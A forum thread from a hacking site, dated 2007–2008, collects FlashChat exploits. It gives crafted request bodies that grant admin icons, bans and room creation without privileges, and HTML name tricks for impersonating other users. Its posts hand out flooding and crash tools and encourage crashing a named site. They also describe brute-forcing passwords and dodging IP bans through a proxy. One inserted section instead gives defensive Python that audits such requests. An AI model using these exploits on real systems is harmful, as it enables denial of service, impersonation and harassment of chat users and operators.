Flashchat exploits, hacks, tools & more

Researching, Proof of Concepts, Hacking, Console Modding and Hacking and more. No game hacking / modding here.

Postby Sethioz » Fri Sep 28, 2007 7:43 pm

The Knowledge Database article on Flashchat exploits is now available. Everything from now on will go there; I will not update this post anymore.

I will collect all the exploits and tools into this very post soon, so it is easy to find all the exploits and tools by only reading first post.
In this topic you will find: (only descriptions for now)

Gadgets:

flashchatz - cmd based program written by Luigi Auriemma, it is a fake user DOS attack and exploit tool for flashchat (attached to post, in downloads and on Luigi's site)

Extreme Flashchat-X - GUI based flashchat client with multiple exploits in it (see below). written by dark_lord_tnt (see in topic).

Exploits:

The following things can be done without knowing the admin/mod password:
kickout another user (except admin)
ban another user (except admin)
check any user's IP with the "/whois" command
add room/s
ring bell
get any icon/emoticon in front of your name (including admin icon)
get any icon/emoticon into the message

maybe i missed something, but i will update the first post from time to time, and i'll try to add all the exploits into this post.

//////////////////////////////////////////////////////////////////////////////////////////////////////////

Code:
    Bell
    sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=

    add room
    sendAndLoad=%5Btype%20Function%5D&ps=&p=1&l=Cat&b=93647&c=adr&cid=1&id=

    admin icon:
    sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=

    mod icon:
    sendAndLoad=%5Btype%20Function%5D&a=%3Amod%3A&u=0&b=13862&c=ravt&cid=1&id=

    ip ban packet:
    sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=
    5581 - id

    whois packet:   
    sendAndLoad=%5Btype%20Function%5D&s=7&t=%2Fwhois%20teele&r=2&u=0&b=20309&c=msg&cid=1&id=

    room alert:
    sendAndLoad=%5Btype%20Function%5D&s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id=

    sendAndLoad=%5Btype%20Function%5D&s=7&t=chatalert&b=18370&c=calrt&cid=1&id= 


for paros proxy (or other intercepting proxies), replace this:

Code:
5D&t=


with this:

Code:
5D&s=7&t=


to get some of the admin rights. you will be able to use /kickout, /whois and such commands with this filter.



//////////////////////////////////////////////////////////////////////////////////////////////////////////

HTML/PHP code exploits:

*Invisible name:
enter this as name

Code:
</b>


*Impersonating others:
-login with invisible name
-now use this command to impersonate somebody

Code:
/me <font color="#000000">[NAME] 0:00 xm: </font>


you can also get icon in front of name (including admin icon)

Code:
/me <font color="#FFFFFF">:D  [NAME]: </font>


where ":D" is smile/icon. to get admin icon in front of name, put ":admin:". here's full example:

Code:
/me <font color="#FF0000">:admin: [NAME]: </font>


-it may vary, depending on the chatroom. some do not use time, some use other font..etc. you must also find the color that this person uses (you can sniff it out from packets). so you just put his/her name into the brackets.

to get colored text too, do this:

Code:
/me <font color="#FF0000">:D [NAME]: </font> <font color"=#8000BF">YOURMESSAGEHERE</font>


*Inject link into your name:
login with the following code/name

Code:
<fontsize="13"></i><a href="http://link.here">Name</a></b>


where "Name" is the name you want and "http://link.here" is obviously where you insert link.
Attachments
flashchatz.zip
(43.02 KiB) Downloaded 1634 times
Sethioz
Admin
 
Posts: 4757
Joined: Fri Jul 27, 2007 5:11 pm
Location: unknown
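
A defender-side view of the request bodies and name tricks listed in this post, as an added example that is not part of the original thread or of FlashChat: it audits logged POST bodies against the role the server holds for the session, and escapes markup in login names. The log records, the role names and the choice of which command codes count as staff-only are assumptions; the bodies are constructed from the ones quoted above.

```python
import html
from urllib.parse import parse_qs

STAFF_ROLES = {"admin", "mod"}           # assumed role names held server-side
# Command codes as they appear in the bodies quoted in the post; which of them
# are staff-only is an assumption about the chat's intended policy.
STAFF_COMMANDS = {"banu": "ban user", "adr": "add room", "ring": "ring bell",
                  "ralrt": "room alert", "calrt": "chat alert"}
STAFF_ICONS = {":admin:", ":mod:"}
STAFF_SLASH = ("/whois", "/kickout")


def parse_body(body):
    """Decode a form-encoded body into {field: first value}, keeping blanks."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def audit(role, body):
    """List what a request asks for that the session's stored role lacks."""
    if role in STAFF_ROLES:
        return []
    f = parse_body(body)
    cmd, text = f.get("c", ""), f.get("t", "")
    findings = []
    if cmd in STAFF_COMMANDS:
        findings.append(f"staff command {cmd} ({STAFF_COMMANDS[cmd]})")
    if cmd == "ravt" and f.get("a") in STAFF_ICONS:
        findings.append(f"staff icon {f['a']}")
    if cmd == "msg" and text.lower().startswith(STAFF_SLASH):
        findings.append(f"staff slash command {text.split()[0]}")
    if f.get("s") == "7":
        findings.append("client-supplied s=7")
    return findings


def name_has_markup(name):
    """Login names containing tag delimiters should be rejected at login."""
    return "<" in name or ">" in name


def display_name(name):
    """Escape a name before it is written into chat markup."""
    return html.escape(name, quote=True)


PREFIX = "sendAndLoad=%5Btype%20Function%5D&"
# Constructed log: (user, role from the server's session table, POST body).
LOG = [
    ("alice", "user", PREFIX + "t=hello&r=2&u=0&b=20310&c=msg&cid=1&id="),
    ("bob", "user", PREFIX + "s=7&t=%2Fwhois%20teele&r=2&u=0&b=20309&c=msg&cid=1&id="),
    ("bob", "user", PREFIX + "s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id="),
    ("carol", "user", PREFIX + "a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id="),
    ("root", "admin", PREFIX + "s=7&t=TEST&r=2&b=18323&c=ralrt&cid=1&id="),
]


def run_audit(log):
    """Return (user, findings) for every request that should be refused."""
    hits = [(user, audit(role, body)) for user, role, body in log]
    return [(user, found) for user, found in hits if found]


if __name__ == "__main__":
    for user, found in run_audit(LOG):
        print(user, "->", "; ".join(found))
    print(display_name('<a href="http://link.here">Name</a>'))
```

In the application itself the same comparison belongs in the request handler, so that the request is refused rather than only logged.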

Re: Flashchatz - flashchat HACKS!!!

Postby Suicidal Looney » Fri Sep 28, 2007 9:43 pm

hmm i see
Suicidal Looney
User
 
Posts: 57
Joined: Sun Jul 29, 2007 7:04 am

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Sat Sep 29, 2007 4:27 am

oh yea and .. dont use this on our chatroom...it will fuck up db.
makes too much users....

Re: Flashchatz - flashchat HACKS!!!

Postby V » Sun Oct 07, 2007 1:31 pm

Damn loved the crash, bet those brats were squealing there like stuck pigs.
Last edited by V on Sun Jan 24, 2010 11:46 am, edited 1 time in total.
V
Important
 
Posts: 159
Joined: Sat Jul 28, 2007 7:36 am

Re: Flashchatz - flashchat HACKS!!!

Postby Skizoteq » Tue Nov 27, 2007 3:39 pm

Crashed xxx.xxx.xx many many times with this puppy 8-) Thank you lord for creating this tool lol by lord i mean luigi :D

EDITED by Sethioz : removed the site name, because now this post is public !
Skizoteq
Forum user
 
Posts: 108
Joined: Tue Jul 31, 2007 11:41 am

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Tue Nov 27, 2007 4:01 pm

yes indeed it's a good one from him. I did get him some info he needed. I will start working to get it working with user : pass chatrooms. Luigi said that np there...he just needs me to get him some info. I need to setup a test chat for that.

oh and btw .. one of the whiners from that xxxxxx chat, he has site with chat too .. and you can crash it using proxy LOL. here it is killerbean.pri.ee .. theres chat too...crash it as much as you want :D

Re: Flashchatz - flashchat HACKS!!!

Postby Skizoteq » Sun Dec 02, 2007 4:52 pm

killerbean :D What's he whining about lol User : pass chatrooms 8-) Oh man what would i ever do without luigi lol

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Sun Dec 02, 2007 11:25 pm

I would have written it myself probably...its not so hard. only need few commands and some data.
Btw guys .. i found MAJOR glitch/bug in the flashchat. It involves specially chats with user : pass.
For example if you mess up some chat so badly that admin decides to change it from ''free'' to ''user : pass'' .. then who ever registers first can choose option ''administrator'' ..actually he/she HAS to choose that. So first registered user will be admin. If you are quicker than admin then you can simply get his place LOL.

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Mon Dec 03, 2007 11:24 pm

FIX
If you dont want noobz crashing your chat, change the name of ''getxml.php'' file. ..and of course you have to modify all the files that use it (index.php, flashchat.php ..etc).

New crash method:
simply open .exe in HEX and modify the ''getxml.php'' to whatever you like.
-note that not all HEX editors work. (you will know if it works or not...if not then you get simple error - not win32 app)


New type of Flashchatz (ill add as attachment).
its still beta, so it doesnt work well. (user flooding works fine, but other options have problems)
-Features :
flood user : pass chatrooms, with all options.
added ''add room'' flooding (IF available for normal users)
added smile flooding ( :D ) ..it causes crash too.

ENJOY!!!

UPDATE
it seems that bell works in all chatrooms, but addroom doesnt seem to work in all chatrooms. I have disabled addroom in my chatroom, but i can still add rooms as normal user.

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Tue Dec 04, 2007 9:36 pm

.
Attachments
flashchatz.zip
4.dets.07
(39.94 KiB) Downloaded 921 times

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Wed Dec 05, 2007 4:41 am

This is hilarious guys :) I was testing with Luigi (he updated the flashchatz) ..he managed to make a ''player flood + bell'' ..so that gave me an idea.
If some fake user can ring bell . .then its possible to everybody. So i did some research .. and FINALLY. i found a way how to ring a bell as normal user (if bell is disabled for normal user).

Interested ? ..course you are. Well what i use is ''Tamper data'' its a firefox add-on. It totally rocks. it allows you to edit EVERYTHING your browser sends. im also using ''live http header'' which Luigi suggested...its easier to capture data, but it wont work for bell. Thats y Luigi never got it working while in chat.
now .. you need the ''ring'' packet. it looks like this

Code:
sendAndLoad=%5Btype%20Function%5D&b=13355&c=ring&cid=1&id=a6657021e8f389f3bc01dcdf0d9c7a54


you DO NOT need the id at end (after id=). im pretty sure you can use this packet.
So what you do is ... you will start tamper (click submit for everything else). you type something in the chat box (DO NOT send it).
for example if you type like ''BLAHTEST1'' ... then press ''send'' and look the tamper. once it gives you pop-up you will click on ''tamper'' this time not ''submit'' ..and look in the right side where the data is. Look closely .. if its the right packet: containing ''BLAHTEST1'' .. then copy the ''ring'' packet (WITHOUT ID !!!!) and replace the whole data there (NOT ID). and then send it ..if it asks something like ... change to ...then click ok.

Little bit messy ? I know ! I will make an video tutorial soon. once you see how tamper works you will understand it ...its easy.

UPDATE
I made video tutorial. hope my talking aint very fucked up (i was tired)
Its in the Video Tutorials Section. ENJOY :D

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Tue Dec 25, 2007 6:50 pm

MAJOR UPDATE:
special thanks to Luigi who wrote the tool.
now it is possible to load users from a file.
user pass
like this. still the old options

1 - user flooding
2 - message flooding
3 - room creation flooding
4 - smile flooding
5 - login/logout flooding
6 - user+bell flooding
+ now you are able to load users from a list.

if you run it, then it will ask you if you want to create users (only for the chatroom that requires registration) then you have 3 options:
y - yes (start making users and flood with specified option)
N - no (do nothing, quit)
filename.txt (loads the specified file, it must be in the same dir with the flashchatz.exe)

YES you can use it to bruteforce user passwords..but simply adding ''victim'' username before each word in your wordlist.
to do this .. you can use cygnus hex editor (it seems that it works best)

it was made ? ..because it is possible to disable registration, so the flashchatz is useless during that. But now you can make users and write them down in file and use them later on. So target chatroom may have registration off, but you can still use existing users :twisted:

note: if you would like some changes ... like username complexity (only numbers, or only symbols instead of mix-alpha-num ones) etc, then let me know. I will make changes and recompile it and upload it.
Attachments
flashchatz.rar
new version of flashchatz (no source code)
(28.38 KiB) Downloaded 887 times

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Sat Mar 15, 2008 7:48 am

just lil something i did myself...
this version only registers users on attack 1, but does not login. so if u wanna fuck up somebodys database...leave it on for 10 hours or so and it should fuck up database. (run 5-20 instances of it to get good results, even more with good connection, 100-200 should not be problem with 100kb upload, just test) I havent tested this on other attacks but 1, i just edited attack one so it registers only.
fff.exe ?? ..couldnt make up anything better..change it if u dont like it.
oh yes and it also have more complex names, it uses some symbols too in names and passes.

note: theres problem with attack 1 and 6 on original version. IT DOES NOT affect register only version (it doesnt have buffer)!!! it seems that luigi made a small mistake and it has infinite buffer size. in other words...leave it on for hour and bye bye pc (ur pc). Thats because theres no buffer limit, ill fix it someday...IF i need to ..but i doubt. no need for that. you will get banned anyways if you leave it on in some chatroom (crashing).
Attachments
fff.rar
(30.35 KiB) Downloaded 659 times

Re: Flashchatz - flashchat HACKS!!!

Postby Sethioz » Sat Apr 19, 2008 2:58 am

Update:
Luigi fixed the memory problem and also fixed the problem with ''space'' in user and/or password.
Now you can use users/passes with spaces and it still loads the file as it should.

at this moment (19th april. 08) the latest version is 0.1.2c

I also added the version that only registers users and doesn't login. Its remade and tested and works 100%.

I will also add on how to use this tool as password cracker. its very easy ! you only need commview and flashchatz, but i doubt tht any of u lazys need it :) ..so im not gonna post it after all. you can always reply here if u need to know how to crack passwords with it.
Attachments
flashchatz012c.rar
Flashchatz version 0.1.2c (fixed user/pass file reading and memory problem)
(27.73 KiB) Downloaded 684 times
fregonly.rar
use attack 1 to register users. Its good to fuck up database.
(30.35 KiB) Downloaded 682 times

FlashChat ( TuFat ) exploits

Postby david zaragoza » Mon Oct 06, 2008 4:16 am

i need help here to hack a TuFat flash chat

i gt the two programs usually used in this matter(WPE pro and tamper data addon for mozilla)

bt i dnt know how to use it.....

so anybody plz help me........


EDIT by Sethioz: topic name changed from "hack a TuFat flash chat"
If you want more detailed tutorial then check Flashchat exploits topic and reply there ! < theres exploits which allow you to ban and boot without admin/mod privileges and more !
david zaragoza
Newbie..
 
Posts: 8
Joined: Mon Oct 06, 2008 4:00 am

Re: hack a TuFat flash chat

Postby Sethioz » Mon Oct 06, 2008 10:43 am

ok do you mean "tufat flash chat" or just "flashchat" .. is tufat like name of the site/room or is it name of the actual chat system ?
have you looked at this -Video- ?
tamper data and WPE are quite good in this matter. If it is some kind of chat system, then link would be good.

Re: hack a TuFat flash chat

Postby david zaragoza » Tue Oct 07, 2008 1:21 am

i meant tufat flashchat

its the name of the chat system

u can google it for more info

wat i want is an immortal mode where u can enter back just after been banned

do u know a way to do this ?

Re: hack a TuFat flash chat

Postby Sethioz » Tue Oct 07, 2008 11:55 am

googling doesn't help me at all, i need example room where to test. reading about it won't give an idea how it works.
to me it seems that tufat flashchat is same as flashchat (one on my site).

as about banning, no there is no way to bypass IP or username ban. It is SQL based and you would need to hack into flashchat/site config files and SQL database to lift the ban. only way is to use other username and IP address.
you can also use proxy server. I have done research on it and the ip is only checked when connecting to flashchat. proxy server lags so it is not good to chat with proxy. what you can do is use proxy to login and then take it off.
You can use Vidalia+TOR and then firefox's addon called ProxySel
with that you will be able to enable/disable proxy with just one click, making it extremely easy to use proxy.

1. enable proxy
2. log into chatroom
3. disable proxy

that way also when admin/moderator checks your ip he/she will see the proxy ip you used to log into chatroom. FlashChat is weak and it does not check IP again. only checks it when you log into chat. I havent checked it, but maybe it is even possible to modify some packets so it wont send ip at all so flashchat thinks you are local client.

If you want more details and info .. give me URL to the chatroom you want to "hack". then i can take a look at it, if its same as mine or not.

Re: hack a TuFat flash chat

Postby david zaragoza » Wed Oct 08, 2008 2:30 am

the tufat flashchat is the same as in ur site....

im a rookie , so i dnt have any idea on how to hack into flashchat config files
abt proxy server, i tried it bt it seems to dnt work....
the firefox addon is nt compatible with my version of mozilla firefox 3.0...pity me

anyway i think its quite hard to hack just like tat....

bt i tried ur video tutorial on getting the admin or mod icon n it worked perfectly....

all the normal chatters thought im an admin....i even made fun with them by saying ur selected as a mod....lolz

had fun with tat....thank u very much sethioz....

bt i had to logout asap when the mod or admin enters.....to avoid being banned ....
then the chatroom mods can view my ip also .... i wanna be an invinsible rookie hacker....lolz




okie then ...how abt this .....changing the message name so it appears like somebody else said tat n make the somebody get banned instead of u....lolz


i read abt it in the topic "FLASHCHAT:ADMIN CONTROL PANEL"

ur msg in tat topic-

"as for more general. chatrooms are very vulnerable. i mean all kinds. for examples:
-in some chatrooms you can change message name, so it appears like somebody else said that (so you can get somebody else banned lol)....."


i actually watched this hack happened in a chatroom while i was chattin.....

the person wrote vulgar words n changed the message name to other person's name in the chatroom(the same chatroom url i sent to u by PM)....

n wow .........it gt the moderator to ban many innocent peoplez ..even me.....damm tat stupid mod......lolz....

so how abt it .....if u teach me how to do it ...it would be great deal of fun plus education...

futhermore knowledge is power ....:-)

Re: hack a TuFat flash chat

Postby Sethioz » Wed Oct 08, 2008 1:01 pm

yes it seems same, y u didnt want to post it out on public ? (url of chat i mean).
It also seems to be customized flash, it is not normal chatroom or at least it seems so. for some reason i didnt even get any data so icon or anything else didnt work for some reason. I just took a quick look in it. but the tool works perfectly :) (tool used to flood shit out of chatroom) it supports many different attack types: userflooding, message flooding, room creation ..etc. It does nothing to the chatroom itself, but it will crash browser's flash script...so everybody has to leave and relogin.
I've been in chatroom many times when it was used on chat .. and sometimes it even crashed my whole browser..doh.

as i said before, you can't bypass IP or username ban. only way is to change your IP or use proxy.
about firefox 3 .. it sucks big time. i even dunno why they made it. it looks childish and lags and doesn't support IMPORTANT addons..like proxysel, but you can always set proxy manually in settings. just put 127.0.0.1 9050 as proxy in firefox, but its annoying and u can't quickly enable/disable it. so i suggest you to get firefox 2 instead. its better in every way.

I will take another look in it anyways (chat).


Update:
i dunno what happened before, but now everything works :) It indeed is same flashchat, just didn't know its called tufat.
specific chatroom you talk about is not on the url you sent me. owner of site has moved the index.php of flashchat to another domain. ill give an example here:
flashchat.com/index.php - this is the chatroom where you sent me and this is where you login.
tufatchat.org/blahdoh/ - this is the path where all other chatroom files are located.

It doesn't really matter where the index is located, because it still sends info into right chatroom if you copy the index.php of the chat. I really have no clue how somebody was able to talk under other names in flashchat, because as far as i know it is ID based.
for example as shown in my tutorials, this is the admin icon:
Code:
sendAndLoad=%5Btype%20Function%5D&a=%3Aadmin%3A&u=0&b=13862&c=ravt&cid=1&id=

now look at the last bit of this data "id=" this is the id part. i left it empty, because you get id when you login or visit the getxml.php page. if you go directly to "getxml.php" (its the page that handles data sent by clients) you get this:
Code:
<response id="a71b57051abd921b01e995bbf31fca84">
   <lout id="665982" t="6:22 pm">login</lout>
</response>

so it gives you id when you visit it too, but i dont think you can use this to talk under other name. you would need to know other person's ID and even then it somehow simply disconnects you.

You can try this of course:
open private window with somebody (i suggest you use help of ur friend).
use commview or WPE pro or something like that to monitor your private messaging.
it should show you other person's ID, but im not sure.
then you can use tamper data and change your ID while sending message.
just like changing icons..etc. you monitor it with tamper data and click tamper, but change only ID not data.

ah yes. i got banned, so i had to use proxy myself. it works like a charm. i only loaded chatroom page with proxy. thats all you need to do. your IP is checked by chatroom only when you LOAD the page, not when you login. so enable proxy and LOAD the "index.php" and then you can disable proxy and login :) just to make it clear:

1. enable proxy
2. go to flashchat.com/index.php (where you see login screen)
3. disable proxy
4. enter name and login

almost forgot. a lil show-off at end :) check the pic and look closely for my message and name there ;)
Attachments
adminlol.JPG
(150.61 KiB) Downloaded 11338 times
